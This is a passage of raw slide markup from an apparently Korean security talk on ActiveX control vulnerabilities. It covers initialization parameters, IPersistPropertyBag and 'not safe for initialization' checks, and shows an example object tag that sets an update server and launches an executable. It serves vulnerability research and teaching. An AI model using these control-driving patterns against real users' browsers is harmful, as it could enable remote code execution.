        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="4833938"/>
            <a:ext cx="5446712" cy="439737"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Windows Vista and ActiveX Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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18" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="4667250"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="5842000"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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20" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="5686425"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2852738" y="3898900"/>
            <a:ext cx="5446712" cy="439738"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 19046"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="449496" tIns="45669" rIns="91339" bIns="45669" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
                <a:ea typeface="HY헤드라인M" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>DBCS and Universal Exploit Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/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15" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2344738" y="3743325"/>
            <a:ext cx="681037" cy="642938"/>
          </a:xfrm>
          <a:prstGeom prst="diamond">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sy="50000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="104136" tIns="52067" rIns="104136" bIns="52067" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1042988" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000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Potentially Vulnerable ActiveX Control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560354" y="1494615"/>
            <a:ext cx="9863138" cy="5543550"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>An ActiveX control is potentially vulnerable if </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>It has any initial parameter or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>It has any method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>We should inspect the potentially vulnerable ActiveX control thoroughly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p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4D10D2-6212-44AC-85ED-3FC53086FC4C}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="모서리가 둥근 직사각형 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1346172" y="4280697"/>
            <a:ext cx="9001188" cy="2428892"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln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lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&lt;object id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>PokerLauncher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:alpha val="30000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="50" charset="-127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917676" y="4709325"/>
            <a:ext cx="61799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800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;param name="Server" value="http://update.server.com/"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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917676" y="5923771"/>
            <a:ext cx="42932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800" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“poker.exe");</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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ko-KR" dirty="0" smtClean="0"/>
              <a:t>ActiveX control should support IPersistPropertyBag or IPersistPropertyBag2 interface to be instantiated with initial parameters</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="C:\DOCUME~1\sweetlie\LOCALS~1\Temp\VMwareDnD\00006842\ie.bmp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846238" y="2851937"/>
            <a:ext cx="6500858" cy="4286240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>IPersistPropertyBag and IPersistPropertyBag2 Interfaces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917676" y="3637795"/>
            <a:ext cx="6389763" cy="218521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altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id=“PokerLauncher" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>clsid:xxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>-…"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        &lt;param name="Server" value="http://update.server.com/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;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8AC3D07-8505-46A1-8F04-B37C796206FB}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Not Safe For Initialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="C:\Documents and Settings\sweetlie\바탕 화면\ErrorMsg.bmp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413367" y="2423309"/>
            <a:ext cx="6072230" cy="4554174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2413367" y="3566317"/>
            <a:ext cx="7148175" cy="260071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altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;object id=“PokerLauncher" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>clsid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        &lt;param name="Server" value="http://update.server.com/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>PokerLauncher.StartGame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>("poker.exe");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="30000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2413367" y="3280565"/>
